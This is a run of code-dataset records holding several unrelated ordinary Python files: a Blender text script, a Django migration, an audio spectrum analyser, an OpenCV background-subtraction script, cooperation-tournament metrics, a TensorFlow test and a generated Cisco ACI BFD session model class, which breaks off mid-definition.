'TextData1'\nob.data.body = \"Line 1\"\nob.data.font = fnt\nob.data.size = 3\n# Inherited Curve attributes\nob.data.extrude = 0.2\nsetMaterial(ob, red)\n\nbpy.ops.object.convert(target='MESH', keep_original=False)\n\n# Create and name TextCurve object #2\nbpy.ops.object.text_add(\nlocation=(0, 2, 0),\nrotation=(0,0,0))\nob = bpy.context.object\nob.name = 'Text2'\n# TextCurve attributes\nob.data.name = 'TextData2'\nob.data.body = \"Line 2\"\nob.data.font = fnt\nob.data.size = 3\n# Inherited Curve attributes\nob.data.extrude = 0.2\nsetMaterial(ob, green)\n\nbpy.ops.object.convert(target='MESH', keep_original=False)\n\n# Create and name TextCurve object #3\nbpy.ops.object.text_add(\nlocation=(0, 0.1, 0),\nrotation=(0,0,0))\nob = bpy.context.object\nob.name = 'Text3'\n# TextCurve attributes\nob.data.body = \"Line 3\"\nob.data.name = 'TextData3'\nob.data.font = fnt\nob.data.size = 3\n# Inherited Curve attributes\nob.data.extrude = 0.2\nsetMaterial(ob, yellow)\n\nbpy.ops.object.convert(target='MESH', keep_original=False)\n\n\nbpy.ops.object.mode_set(mode='EDIT')\nbpy.ops.uv.smart_project()\nbpy.ops.object.mode_set(mode='OBJECT')\n \n","sub_path":"anims/text/text-multiline-01.py","file_name":"text-multiline-01.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"575152957","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('accounts', '0025_auto_20150809_1723'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='account',\n name='custom_conv',\n field=models.TextField(null=True, verbose_name=b'\\xe4\\xb8\\x8e\\xe6\\x9c\\x8d\\xe5\\x8a\\xa1\\xe5\\x99\\xa8\\xe7\\x9a\\x84\\xe7\\xa7\\x81\\xe8\\x81\\x8aid', blank=True),\n ),\n ]\n","sub_path":"accounts/migrations/0026_auto_20150810_1103.py","file_name":"0026_auto_20150810_1103.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"367819208","text":"#!/usr/bin/env python\n# -*- charset utf8 -*-\n\nimport pyaudio\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\nimport matplotlib.animation\n\nRATE = 44100\nBUFFER = 882\n\np = pyaudio.PyAudio()\n\nstream = p.open(\n format = pyaudio.paFloat32,\n channels = 1,\n rate = RATE,\n input = True,\n output = False,\n frames_per_buffer = BUFFER\n)\n\nfig = plt.figure()\nline1 = plt.plot([],[])[0]\nline2 = plt.plot([],[])[0]\n\nr = range(0,int(RATE/2+1),int(RATE/BUFFER))\nl = len(r)\n\ndef init_line():\n line1.set_data(r, [-1000]*l)\n line2.set_data(r, [-1000]*l)\n return (line1,line2,)\n\ndef update_line(i):\n try:\n data = np.fft.rfft(np.frombuffer(\n stream.read(BUFFER), dtype=np.float32)\n )\n except IOError:\n pass\n data = np.log10(np.sqrt(\n np.real(data)**2+np.imag(data)**2) / BUFFER) * 10\n line1.set_data(r, data)\n line2.set_data(np.maximum(line1.get_data(), line2.get_data()))\n return (line1,line2,)\n\nplt.xlim(0, RATE/2+1)\nplt.ylim(-60, 0)\nplt.xlabel('Frequency')\nplt.ylabel('dB')\nplt.title('Spectrometer')\nplt.grid()\n\nline_ani = matplotlib.animation.FuncAnimation(\n fig, update_line, init_func=init_line, interval=0, blit=True\n)\n\nplt.show()\n","sub_path":"s2l_01_spectrum_analyzer.py","file_name":"s2l_01_spectrum_analyzer.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"560287779","text":"import cv2\nimport numpy as np\nimport imutils\nimport time\nfrom skimage import measure\nfrom skimage import filters\nimport matplotlib.pyplot as plt\n\ncap = cv2.VideoCapture(\"data/0001_L.mp4\")\nfwidth = cap.get(cv2.CAP_PROP_FRAME_WIDTH)\nfheight = cap.get(cv2.CAP_PROP_FRAME_HEIGHT)\n\nbg = cv2.imread(\"data/side-view.jpg\", cv2.IMREAD_COLOR)\n\ndef inPolygon(x, y, xp, yp):\n c = 0\n for i in range(len(xp)):\n if (((yp[i] <= y and y < yp[i-1]) or (yp[i-1] <= y and y < yp[i])) and\n (x > (xp[i-1] - xp[i]) * (y - yp[i]) / (yp[i-1] - yp[i]) + xp[i])):\n c = 1 - c\n if c == 1:\n return True\n return False\n\ndef tresh(pixel):\n if pixel[0] < 40 and pixel[1] < 40 and pixel[2] < 40:\n return False\n return True\n\ndef masking(img, bg, polyX, polyY, offset_v=0, offset_h=0):\n n_rows = img.shape[0]\n n_cols = img.shape[1]\n bg_hsv = cv2.cvtColor(bg, cv2.COLOR_BGR2HSV)\n m = np.zeros([n_rows, n_cols], dtype=np.int)\n # obj_x = []\n # obj_y = []\n\n for i in range(offset_v - 1, n_rows - 1):\n for j in range(offset_h - 1, n_cols - 1):\n bg_hue = int(bg_hsv[i, j, 0])\n\n if not on_field_background(bg_hue) or not inPolygon(j, i, polyX, polyY) or not tresh(img[i, j]):\n continue\n\n m[i, j] = 1\n # obj_x.append(i)\n # obj_y.append(j)\n\n return m #, np.array(obj_x, dtype=np.int), np.array(obj_y, dtype=np.int)\n\ndef mask_background(img, mask, mask_color=(0, 0, 0)):\n result = np.array(img, copy=True)\n result[mask == 0] = mask_color\n result[mask == 1] = (255, 255, 255)\n return result\n\ndef on_field_background(hue):\n if hue in range(35, 45):\n return True\n return False\n\ndef feature_vector(img, obj_x, obj_y, x_max, y_max, increment=1):\n n_features = 3\n result = np.zeros([1, n_features])\n result_norm = np.zeros([1, n_features])\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n n_points = obj_x.size\n for i in range(0, n_points, increment):\n x = obj_x[i]\n y = obj_y[i]\n hue = hsv[x, y, 0]\n # sat = hsv[x, y, 1]\n\n fv = np.array([x, y, hue])\n result = np.vstack((result, fv))\n\n # Normalize the values\n\n x = x / (x_max - 1)\n y = y / (y_max - 1)\n hue = hue / 179.\n # sat = sat / 255.\n\n fv = np.array([x, y, hue])\n result_norm = np.vstack((result_norm, fv))\n\n result_norm = np.delete(result_norm, 0, 0)\n result = np.delete(result, 0, 0)\n return result_norm, result\n\n# for i in range(500):\n# __, f = cap.read()\n\nwhile(1):\n ret, f = cap.read()\n if ret is False:\n break\n\n diff = cv2.absdiff(f, bg)\n\n x = (295, 640, 640, 0)\n y = (95, 115, 380, 250)\n\n obj_mask = masking(diff, bg, x, y)\n fg = mask_background(diff, obj_mask)\n\n # n = 2\n # l = 10\n #\n # im = filters.gaussian(fg, sigma=l / (4. * n), multichannel=False)\n # blobs = im > 0.7 * im.mean()\n # labels = measure.label(fg, neighbors=8, background=0)\n #\n # for label in np.unique(labels):\n # if label == 0:\n # continue\n #\n # labelMask = np.zeros(fg.shape, dtype=\"uint8\")\n # labelMask[labels == label] = 255\n # fg = cv2.add(fg, labelMask)\n\n\n cv2.imshow('absdiff', fg)\n\n # start_time = time.time()\n # fvs, fvs_raw = feature_vector(fg, obj_x, obj_y, x_max=fheight, y_max=fwidth, increment=4)\n # print(\"Feature vectors %s (%ds)\" % (str(fvs.shape), (time.time() - start_time)))\n # np.savetxt(\"foreground.txt\", fvs, '%5.8f')\n # np.savetxt(\"foreground_unnormalized.txt\", fvs_raw, '%5.0f')\n # exit()\n\n k = cv2.waitKey(30) & 0xff\n if k == 27:\n break\n\n\ncap.release()\ncv2.destroyAllWindows()","sub_path":"test_diff.py","file_name":"test_diff.py","file_ext":"py","file_size_in_byte":3716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"417598847","text":"import numpy as np\nfrom sklearn import metrics\nimport matplotlib.pyplot as plt\nfrom run_tournament import *\nimport statistics as st\n\n\ndef mean_std(values, rd = 3):\n m = st.mean(values)\n std = st.stdev(values)\n return (np.round(m, rd) , np.round(std, rd))\n\ndef efficiency(payoffs_agents, payoffs_nices, payoffs_defectors):\n n_agents = len(payoffs_agents)\n t_max = len(payoffs_agents[0])\n social_welfare = [sum([payoffs_agents[i][t] for i in range(n_agents)]) for t in range(t_max)]\n social_welfare_opt = [sum([payoffs_nices[i][t] for i in range(n_agents)]) for t in range(t_max)]\n social_welfare_worse = [sum([payoffs_defectors[i][t] for i in range(n_agents)]) for t in range(t_max)]\n efficiency_output = [(social_welfare[t]-social_welfare_worse[0])/(social_welfare_opt[0]-social_welfare_worse[0]) for t in range(t_max)]\n return np.round(efficiency_output[-1],3), efficiency_output\n\n\ndef speed(efficiency_list, delta_T=20):\n delta_T = min(len(efficiency_list), delta_T)\n print(delta_T)\n final_efficiency = efficiency_list[-1]\n print(final_efficiency)\n x = np.arange(delta_T)\n if final_efficiency == 0:\n output = 0.0\n else:\n output = metrics.auc(x, efficiency_list[:delta_T])/(delta_T*final_efficiency)\n return np.round(output, 3)\n\n\ndef incentive_compatibility(curve_payoffs_1nice, curve_payoffs_1egoist, payoffs_nices, payoffs_egoists):\n output = sum(curve_payoffs_1nice) - sum(curve_payoffs_1egoist)\n output /= sum(payoffs_nices) - sum(payoffs_egoists)\n return np.clip(np.round(output, 3), 0, 1)\n\n\ndef safety(curve_payoffs_1Agent_allDef, curve_payoffs_egoists, curve_payoffs_1Nice_allDef):\n output = sum(curve_payoffs_1Agent_allDef) - sum(curve_payoffs_egoists)\n output /= sum(curve_payoffs_egoists) - sum(curve_payoffs_1Nice_allDef)\n return np.round(output, 3)\n\n\ndef forgiveness_old(all_agents_payoffs, lateNice_vs_agents_payoffs, t_max=100, tau1 = 50, delta_T = 20):\n v_late_nice_0 = lateNice_vs_agents_payoffs[tau1+1]\n v_optimal_final = all_agents_payoffs[-1]\n delta_T = min(delta_T, (t_max-tau1-1))\n cst_norm = delta_T*(v_optimal_final-v_late_nice_0)\n x = np.arange(delta_T)\n output = metrics.auc(x, lateNice_vs_agents_payoffs[tau1+1:tau1+1+delta_T])\n output -= v_late_nice_0*(delta_T-1)\n output /= cst_norm\n if abs(v_optimal_final-v_late_nice_0) < 1e-3:\n return 1.0\n else:\n return np.clip(np.round(output, 3), 0, 1)\n\n\ndef forgiveness(lateNice_vs_agents_payoffs, payoffs_nices, payoffs_defectors, tau1 = 20):\n\n n_agents = len(lateNice_vs_agents_payoffs)\n t_max = len(lateNice_vs_agents_payoffs[0])\n social_welfare = [sum([lateNice_vs_agents_payoffs[i][t] for i in range(n_agents)]) for t in range(tau1, t_max)]\n social_welfare_opt = [sum([payoffs_nices[i][t] for i in range(n_agents)]) for t in range(tau1, t_max)]\n social_welfare_worse = [sum([payoffs_defectors[i][t] for i in range(n_agents)]) for t in range(tau1, t_max)]\n output = [(social_welfare[t] - social_welfare_worse[0]) / (social_welfare_opt[0] - social_welfare_worse[0]) for t in range(t_max- tau1)]\n\n return np.round(np.mean(output),3)\n\n\n\ndef reset_agents(list_of_agents):\n for a in list_of_agents:\n a.reset()\n\ndef compute_metrics(tournament, list_of_nA_agents, t_max, delta_T = 20, tau1=50, metrics_fig='output_metrics.png', repentant_behavior=False):\n\n n_agents = tournament.n_agents\n coop_max_matrix = tournament.max_coop\n\n assert len(list_of_nA_agents) >= n_agents\n\n t_coop_LN = tau1\n\n # LIST of n_agents instances of the Agent we want to study\n list_all_agents = list_of_nA_agents\n\n # LIST of: One Late Nice + (n_agents-1) instances of the Agent\n list_agents_LN = [Agent_LateNice(0, 'LateNice', n_agents=n_agents, max_coop_matrix=coop_max_matrix,\n t_coop=t_coop_LN)] + list_all_agents[1:]\n\n # LIST of: One instance of a Nice agent (Cooperator) + (n_agents-1) instances of the Agent\n list_agents_1Coop = [Agent_Nice(0, 'Nice', n_agents=n_agents, max_coop_matrix=coop_max_matrix)] + list_all_agents[1:]\n\n # LIST of: One instance of a Egoist agent (Defector) + (n_agents-1) instances of the Agent\n list_agents_1Def = [Agent_Egoist(0, 'Egoist', n_agents=n_agents, max_coop_matrix=coop_max_matrix)] + list_all_agents[1:]\n\n # LIST of: One instance of n_agents Nice agents\n list_all_Nices = [Agent_Optimal(i, 'Opt', n_agents=n_agents, max_coop_matrix=coop_max_matrix, optimal_subgraph = tournament.optimal_graph) for i in range(n_agents)]\n\n # LIST of: One instance of n_agents Egoist agents\n list_all_Defectors = [Agent_Egoist(i, 'E', n_agents=n_agents, max_coop_matrix=coop_max_matrix) for i in range(n_agents)]\n\n # LIST of: One instance of a the Agent + (n_agents-1) Egoist agents\n list_1Agent_all_Def = [list_all_agents[0]] + [Agent_Egoist(i+1, 'E', n_agents=n_agents, max_coop_matrix=coop_max_matrix) for i in range(n_agents-1)]\n\n # LIST of: One Nice Agent + (n_agents-1) Egoist agents\n list_1Nice_all_Def = [Agent_Nice(0, 'N', n_agents=n_agents, max_coop_matrix=coop_max_matrix)] + [\n Agent_Egoist(i + 1, 'E', n_agents=n_agents, max_coop_matrix=coop_max_matrix) for i in range(n_agents - 1)]\n\n\n\n # RUNNING Tournaments with different lists of Agents to compute metrics\n N_runs = 8\n k = 1\n\n tournament.reset()\n reset_agents(list_agents_LN)\n print()\n print(\"#### RUN EVAL TOURNAMENT \"+str(k)+'/'+str(N_runs))\n k += 1\n payoffs_agents_LateNice = run_tournament(tournament=tournament, list_agents=list_agents_LN, n_steps=t_max, render=False, name_expe='late-test', print_steps=False)\n\n tournament.reset()\n reset_agents(list_all_agents)\n print()\n print(\"#### RUN EVAL TOURNAMENT \"+str(k)+'/'+str(N_runs))\n k += 1\n payoffs_agents = run_tournament(tournament=tournament, list_agents=list_all_agents, n_steps=t_max, render=False, name_expe=\"test_all_TFT\", print_steps=False)\n\n tournament.reset()\n reset_agents(list_all_Nices)\n print()\n print(\"#### RUN EVAL TOURNAMENT \"+str(k)+'/'+str(N_runs))\n k += 1\n payoffs_nices = run_tournament(tournament=tournament, list_agents=list_all_Nices, n_steps=t_max, render=False, print_steps=False)\n\n tournament.reset()\n reset_agents(list_all_Defectors)\n print()\n print(\"#### RUN EVAL TOURNAMENT \"+str(k)+'/'+str(N_runs))\n k += 1\n payoffs_defectors = run_tournament(tournament=tournament, list_agents=list_all_Defectors, n_steps=t_max, render=False, print_steps=False)\n\n tournament.reset()\n reset_agents(list_agents_1Def)\n print()\n print(\"#### RUN EVAL TOURNAMENT \"+str(k)+'/'+str(N_runs))\n k += 1\n payoffs_agents_1Egoist = run_tournament(tournament=tournament, list_agents=list_agents_1Def, n_steps=t_max, render=False, print_steps=False)\n\n tournament.reset()\n reset_agents(list_agents_1Coop)\n print()\n print(\"#### RUN EVAL TOURNAMENT \"+str(k)+'/'+str(N_runs))\n k += 1\n payoffs_agents_1Nice = run_tournament(tournament=tournament, list_agents=list_agents_1Coop, n_steps=t_max, render=False, print_steps=False)\n\n tournament.reset()\n reset_agents(list_1Agent_all_Def)\n print()\n print(\"#### RUN EVAL TOURNAMENT \"+str(k)+'/'+str(N_runs))\n k += 1\n payoffs_agents_1Agent_all_Def = run_tournament(tournament=tournament, list_agents=list_1Agent_all_Def, n_steps=t_max, render=False, print_steps=False)\n\n tournament.reset()\n reset_agents(list_1Nice_all_Def)\n print()\n print(\"#### RUN EVAL TOURNAMENT \"+str(k)+'/'+str(N_runs))\n k += 1\n payoffs_agents_1Nice_all_Def = run_tournament(tournament=tournament, list_agents=list_1Nice_all_Def, n_steps=t_max, render=False, print_steps=False)\n\n\n curve_payoffs_LN = payoffs_agents_LateNice[0]\n curve_payoffs_agents = payoffs_agents[0]\n curve_payoffs_nices = payoffs_nices[0]\n curve_payoffs_1egoist = payoffs_agents_1Egoist[0]\n curve_payoffs_1nice = payoffs_agents_1Nice[0]\n curve_payoffs_egoists = payoffs_defectors[0]\n curve_payoffs_1Agent_allDef = payoffs_agents_1Agent_all_Def[0]\n curve_payoffs_1Nice_allDef = payoffs_agents_1Nice_all_Def[0]\n\n\n plt.plot(curve_payoffs_LN, label='Repentant defector', color = 'purple')\n plt.plot(curve_payoffs_agents, label='Agent vs (N-1) agents', color = 'orange')\n plt.plot(curve_payoffs_nices, label='Optimal - all cooperators', color = 'green')\n\n plt.plot(curve_payoffs_egoists, label='Worst - all defectors', color = 'brown')\n #plt.plot(curve_payoffs_1Agent_allDef, label='Agent vs all defectors', color = 'orange')\n #plt.plot(curve_payoffs_1Nice_allDef, label='Cooperator vs all defectors', color = 'green')\n plt.plot(curve_payoffs_1nice, label='Nice vs (N-1) agents', color='pink')\n plt.plot(curve_payoffs_1egoist, label = 'Egoist vs (N-1) agents', color = 'red')\n\n plt.legend(loc=0)\n plt.xlabel('steps')\n plt.ylabel('payoff')\n plt.savefig(metrics_fig)\n plt.clf()\n\n ef, evo_efficiency = efficiency(payoffs_agents, payoffs_nices, payoffs_defectors)\n sp = speed(evo_efficiency, delta_T=delta_T)\n ic = incentive_compatibility(curve_payoffs_1nice, curve_payoffs_1egoist, curve_payoffs_nices, curve_payoffs_egoists)\n sf = safety(curve_payoffs_1Agent_allDef, curve_payoffs_egoists, curve_payoffs_1Nice_allDef)\n #fg = forgiveness(payoffs_agents[0], payoffs_agents_LateNice[0], t_max=t_max, tau1=tau1, delta_T=delta_T)\n fg = forgiveness(payoffs_agents_LateNice, payoffs_nices, payoffs_defectors, tau1=t_coop_LN)\n\n\n print()\n print(\"Efficiency = \", ef)\n print(\"Speed = \", sp)\n print(\"IC = \", ic)\n print(\"Safety = \", sf)\n print(\"Forgiveness = \", fg)\n\n return [ef, sp, fg, ic, sf]\n\n","sub_path":"social_metrics.py","file_name":"social_metrics.py","file_ext":"py","file_size_in_byte":9665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"377257565","text":"import unittest\n\nimport tensorflow as tf\n\nclass TestTensorflow(unittest.TestCase):\n def test_addition(self): \n op = tf.add(2, 3) \n sess = tf.Session()\n\n result = sess.run(op)\n\n self.assertEqual(5, result)\n","sub_path":"tests/test_tensorflow.py","file_name":"test_tensorflow.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"241031641","text":"# coding=UTF-8\n# **********************************************************************\n# Copyright (c) 2013-2020 Cisco Systems, Inc. All rights reserved\n# written by zen warriors, do not modify!\n# **********************************************************************\n\n\nfrom cobra.mit.meta import ClassMeta\nfrom cobra.mit.meta import StatsClassMeta\nfrom cobra.mit.meta import CounterMeta\nfrom cobra.mit.meta import PropMeta\nfrom cobra.mit.meta import Category\nfrom cobra.mit.meta import SourceRelationMeta\nfrom cobra.mit.meta import NamedSourceRelationMeta\nfrom cobra.mit.meta import TargetRelationMeta\nfrom cobra.mit.meta import DeploymentPathMeta, DeploymentCategory\nfrom cobra.model.category import MoCategory, PropCategory, CounterCategory\nfrom cobra.mit.mo import Mo\n\n\n# ##################################################\nclass Sess(Mo):\n \"\"\"\n This object holds bfd session information \n\n \"\"\"\n\n meta = ClassMeta(\"cobra.model.bfd.Sess\")\n\n meta.moClassName = \"bfdSess\"\n meta.rnFormat = \"session-%(discr)s\"\n meta.category = MoCategory.REGULAR\n meta.label = \"BFD Session\"\n meta.writeAccessMask = 0x8008020040001\n meta.readAccessMask = 0x8008020040001\n meta.isDomainable = False\n meta.isReadOnly = True\n meta.isConfigurable = False\n meta.isDeletable = False\n meta.isContextRoot = False\n\n meta.childClasses.add(\"cobra.model.fault.Counts\")\n meta.childClasses.add(\"cobra.model.health.Inst\")\n meta.childClasses.add(\"cobra.model.fault.Inst\")\n meta.childClasses.add(\"cobra.model.bfd.SessStats\")\n meta.childClasses.add(\"cobra.model.bfd.RtMbrSess\")\n meta.childClasses.add(\"cobra.model.bfd.PeerV\")\n meta.childClasses.add(\"cobra.model.bfd.SessApp\")\n meta.childClasses.add(\"cobra.model.bfd.RsMbrSess\")\n\n meta.childNamesAndRnPrefix.append((\"cobra.model.bfd.RsMbrSess\", \"rsmbrSess-\"))\n meta.childNamesAndRnPrefix.append((\"cobra.model.bfd.RtMbrSess\", \"rtmbrSess\"))\n meta.childNamesAndRnPrefix.append((\"cobra.model.fault.Counts\", \"fltCnts\"))\n meta.childNamesAndRnPrefix.append((\"cobra.model.health.Inst\", \"health\"))\n meta.childNamesAndRnPrefix.append((\"cobra.model.fault.Inst\", \"fault-\"))\n meta.childNamesAndRnPrefix.append((\"cobra.model.bfd.SessStats\", \"stats\"))\n meta.childNamesAndRnPrefix.append((\"cobra.model.bfd.PeerV\", \"peerv\"))\n meta.childNamesAndRnPrefix.append((\"cobra.model.bfd.SessApp\", \"app-\"))\n\n meta.parentClasses.add(\"cobra.model.bfd.Inst\")\n\n meta.rnPrefixes = [\n ('session-', True),\n ]\n\n prop = PropMeta(\"str\", \"asyncPort\", \"asyncPort\", 17003, PropCategory.REGULAR)\n prop.label = \"Async Source Port\"\n prop.isOper = True\n prop.range = [(0, 65535)]\n prop.defaultValue = 0\n prop.defaultValueStr = \"unspecified\"\n prop._addConstant(\"dns\", \"dns\", 53)\n prop._addConstant(\"ftpData\", \"ftp-data\", 20)\n prop._addConstant(\"http\", \"http\", 80)\n prop._addConstant(\"https\", \"https\", 443)\n prop._addConstant(\"pop3\", \"pop3\", 110)\n prop._addConstant(\"rtsp\", \"rtsp\", 554)\n prop._addConstant(\"smtp\", \"smtp\", 25)\n prop._addConstant(\"unspecified\", \"unspecified\", 0)\n meta.props.add(\"asyncPort\", prop)\n\n prop = PropMeta(\"str\", \"authSeqno\", \"authSeqno\", 17021, PropCategory.REGULAR)\n prop.label = \"Authentication Sequence Number\"\n prop.isOper = True\n meta.props.add(\"authSeqno\", prop)\n\n prop = PropMeta(\"str\", \"authType\", \"authType\", 17020, PropCategory.REGULAR)\n prop.label = \"Active value of Auth Type\"\n prop.isOper = True\n prop.defaultValue = 0\n prop.defaultValueStr = \"none\"\n prop._addConstant(\"none\", \"no-authentication\", 0)\n prop._addConstant(\"sha1\", \"keyed-sha1\", 4)\n meta.props.add(\"authType\", prop)\n\n prop = PropMeta(\"str\", \"childAction\", \"childAction\", 4, PropCategory.CHILD_ACTION)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n prop._addConstant(\"deleteAll\", \"deleteall\", 16384)\n prop._addConstant(\"deleteNonPresent\", \"deletenonpresent\", 8192)\n prop._addConstant(\"ignore\", \"ignore\", 4096)\n meta.props.add(\"childAction\", prop)\n\n prop = PropMeta(\"str\", \"destAddr\", \"destAddr\", 17011, PropCategory.REGULAR)\n prop.label = \"Destination IP Address\"\n prop.isOper = True\n meta.props.add(\"destAddr\", prop)\n\n prop = PropMeta(\"str\", \"detectMult\", \"detectMult\", 17019, PropCategory.REGULAR)\n prop.label = \"Active value of Detection Multiplier\"\n prop.isOper = True\n prop.range = [(1, 50)]\n prop.defaultValue = 3\n prop.defaultValueStr = \"3\"\n meta.props.add(\"detectMult\", prop)\n\n prop = PropMeta(\"str\", \"diag\", \"diag\", 17024, PropCategory.REGULAR)\n prop.label = \"Protocol Diag\"\n prop.isOper = True\n prop._addConstant(\"admin-down\", \"administratively-down\", 7)\n prop._addConstant(\"concat-path-down\", \"concatenated-path-down\", 6)\n prop._addConstant(\"detect-timeout\", \"control-detection-time-expired\", 1)\n prop._addConstant(\"echo-fail\", \"echo-function-failed\", 2)\n prop._addConstant(\"fwd-plane-reset\", \"forwarding-plane-reset\", 4)\n prop._addConstant(\"nbr-signal-down\", \"neighbor-signaled-session-down\", 3)\n prop._addConstant(\"none\", \"no-diagnostic\", 0)\n prop._addConstant(\"path-down\", \"path-down\", 5)\n prop._addConstant(\"rev-concat-path-down\", \"reverse-concatenated-path-down\", 8)\n meta.props.add(\"diag\", prop)\n\n prop = PropMeta(\"str\", \"discr\", \"discr\", 17001, PropCategory.REGULAR)\n prop.label = \"Local Session Identifier\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.isCreateOnly = True\n prop.isNaming = True\n meta.props.add(\"discr\", prop)\n\n prop = PropMeta(\"str\", \"dn\", \"dn\", 1, PropCategory.DN)\n prop.label = \"None\"\n prop.isDn = True\n prop.isImplicit = True\n prop.isAdmin = True\n prop.isCreateOnly = True\n meta.props.add(\"dn\", prop)\n\n prop = PropMeta(\"str\", \"echoPort\", \"echoPort\", 17004, PropCategory.REGULAR)\n prop.label = \"Echo Source Port\"\n prop.isOper = True\n prop.range = [(0, 65535)]\n prop.defaultValue = 0\n prop.defaultValueStr = \"unspecified\"\n prop._addConstant(\"dns\", \"dns\", 53)\n prop._addConstant(\"ftpData\", \"ftp-data\", 20)\n prop._addConstant(\"http\", \"http\", 80)\n prop._addConstant(\"https\", \"https\", 443)\n prop._addConstant(\"pop3\", \"pop3\", 110)\n prop._addConstant(\"rtsp\", \"rtsp\", 554)\n prop._addConstant(\"smtp\", \"smtp\", 25)\n prop._addConstant(\"unspecified\", \"unspecified\", 0)\n meta.props.add(\"echoPort\", prop)\n\n prop = PropMeta(\"str\", \"echoTxIntvl\", \"echoTxIntvl\", 17016, PropCategory.REGULAR)\n prop.label = \"Active Value of Echo Tx Interval\"\n prop.isOper = True\n prop.range = [(50, 999)]\n prop.defaultValue = 50\n prop.defaultValueStr = \"50\"\n meta.props.add(\"echoTxIntvl\", prop)\n\n prop = PropMeta(\"str\", \"flags\", \"flags\", 17025, PropCategory.REGULAR)\n prop.label = \"Packet Flags\"\n prop.isOper = True\n prop._addConstant(\"authentication\", \"authentication\", 8)\n prop._addConstant(\"demand\", \"demand\", 1)\n prop._addConstant(\"final\", \"final\", 4)\n prop._addConstant(\"poll\", \"poll\", 2)\n meta.props.add(\"flags\", prop)\n\n prop = PropMeta(\"str\", \"ifId\", \"ifId\", 17007, PropCategory.REGULAR)\n prop.label = \"Interface ID\"\n prop.isOper = True\n meta.props.add(\"ifId\", prop)\n\n prop = PropMeta(\"str\", \"iod\", \"iod\", 17008, PropCategory.REGULAR)\n prop.label = \"Interface ordinal\"\n prop.isOper = True\n prop.range = [(1, 4294967295)]\n prop.defaultValue = 1\n prop.defaultValueStr = \"1\"\n meta.props.add(\"iod\", prop)\n\n prop = PropMeta(\"str\", \"lastDiag\", \"lastDiag\", 17027, PropCategory.REGULAR)\n prop.label = \"Last Diag\"\n prop.isOper = True\n prop._addConstant(\"admin-down\", \"administratively-down\", 7)\n prop._addConstant(\"concat-path-down\", \"concatenated-path-down\", 6)\n prop._addConstant(\"detect-timeout\", \"control-detection-time-expired\", 1)\n prop._addConstant(\"echo-fail\", \"echo-function-failed\", 2)\n prop._addConstant(\"fwd-plane-reset\", \"forwarding-plane-reset\", 4)\n prop._addConstant(\"nbr-signal-down\", \"neighbor-signaled-session-down\", 3)\n prop._addConstant(\"none\", \"no-diagnostic\", 0)\n prop._addConstant(\"path-down\", \"path-down\", 5)\n prop._addConstant(\"rev-concat-path-down\", \"reverse-concatenated-path-down\", 8)\n meta.props.add(\"lastDiag\", prop)\n\n prop = PropMeta(\"str\", \"lastDownTime\", \"lastDownTime\", 17028, PropCategory.REGULAR)\n prop.label = \"Last Down Time\"\n prop.isOper = True\n meta.props.add(\"lastDownTime\", prop)\n\n prop = PropMeta(\"str\", \"lastTransTime\", \"lastTransTime\", 17026, PropCategory.REGULAR)\n prop.label = \"Transition Time\"\n prop.isOper = True\n meta.props.add(\"lastTransTime\", prop)\n\n prop = PropMeta(\"str\", \"localDetectMult\", \"localDetectMult\", 17014, PropCategory.REGULAR)\n prop.label = \"Local value of Detection Multiplier\"\n prop.isOper = True\n prop.range = [(1, 50)]\n prop.defaultValue = 3\n prop.defaultValueStr = \"3\"\n meta.props.add(\"localDetectMult\", prop)\n\n prop = PropMeta(\"str\", \"localMac\", \"localMac\", 17005, PropCategory.REGULAR)\n prop.label = \"Local MAC Address\"\n prop.isOper = True\n meta.props.add(\"localMac\", prop)\n\n prop = PropMeta(\"str\", \"localRxIntvl\", \"localRxIntvl\", 17013, PropCategory.REGULAR)\n prop.label = \"Local Value of Rx Interval\"\n prop.isOper = True\n prop.range = [(50, 999)]\n prop.defaultValue = 50\n prop.defaultValueStr = \"50\"\n meta.props.add(\"localRxIntvl\", prop)\n\n prop = PropMeta(\"str\", \"localTxIntvl\", \"localTxIntvl\", 17012, PropCategory.REGULAR)\n prop.label = \"Local Value of Tx Interval\"\n prop.isOper = True\n prop.range = [(50, 999)]\n prop.defaultValue = 50\n prop.defaultValueStr = \"50\"\n meta.props.add(\"localTxIntvl\", prop)\n\n prop = PropMeta(\"str\", \"modTs\", \"modTs\", 7, PropCategory.REGULAR)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n prop.defaultValue = 0\n prop.defaultValueStr = \"never\"\n prop._addConstant(\"never\", \"never\", 0)\n meta.props.add(\"modTs\", prop)\n\n prop = PropMeta(\"str\", \"monPolDn\", \"monPolDn\", 17538, PropCategory.REGULAR)\n prop.label = \"Monitoring policy attached to this observable object\"\n prop.isImplicit = True\n prop.isAdmin = True\n meta.props.add(\"monPolDn\", prop)\n\n prop = PropMeta(\"str\", \"operSt\", \"operSt\", 17022, PropCategory.REGULAR)\n prop.label = \"Oper State\"\n prop.isOper = True\n prop._addConstant(\"admin-down\", \"admindown\", 0)\n prop._addConstant(\"down\", \"down\", 1)\n prop._addConstant(\"init\", \"init\", 2)\n prop._addConstant(\"up\", \"up\", 3)\n meta.props.add(\"operSt\", prop)\n\n prop = PropMeta(\"str\", \"remoteDiscr\", \"remoteDiscr\", 17002, PropCategory.REGULAR)\n prop.label = \"Remote Session Identifier\"\n prop.isOper = True\n meta.props.add(\"remoteDiscr\", prop)\n\n prop = PropMeta(\"str\", \"remoteMac\", \"remoteMac\", 17006, 